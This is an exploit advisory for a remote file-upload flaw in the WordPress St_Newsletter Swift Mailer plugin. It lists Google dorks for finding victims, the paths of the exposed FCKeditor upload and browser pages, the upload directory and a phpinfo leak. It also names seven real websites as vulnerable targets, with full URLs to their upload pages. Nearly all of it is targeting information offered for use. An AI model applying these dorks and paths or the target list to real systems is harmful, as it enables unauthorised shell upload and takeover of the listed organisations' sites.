################################################################################################# # Exploit Title : WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/12/2018 # Vendor Homepage : wordpress.org ~ forums.devnetwork.net ~ swiftmailer.symfony.com ~ swiftmailer.org # Software Download Link : N/A ~ wordpress.org/plugins/swift-mailer/ # Tested On : Windows and Linux # Category : WebApps # Version Information : 2.0 ~ 2.0.9 ~ 2.1.2 ~ 2.3 ~ 2.5.1 ~ 2.7 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/st_newsletter/'' + intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design'' + intext:''Copyright © 2000-2012 Silicon Valley Fellowship'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] ################################################################################################# # Exploit : /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/connectors/test.html /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html # Directory File Path : /wp-content/uploads/...... /wp-content/uploads/[YEAR]/[MONTH].... # Exploit : phpinfo System Information /wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php ################################################################################################# # Note : This plugin St_Newsletter Swift Mailer contains a very serious vulnerability that allowed hackers to gain full control – modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website, a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory. ################################################################################################# # Example Vulnerable Sites => [+] revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html [+] preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################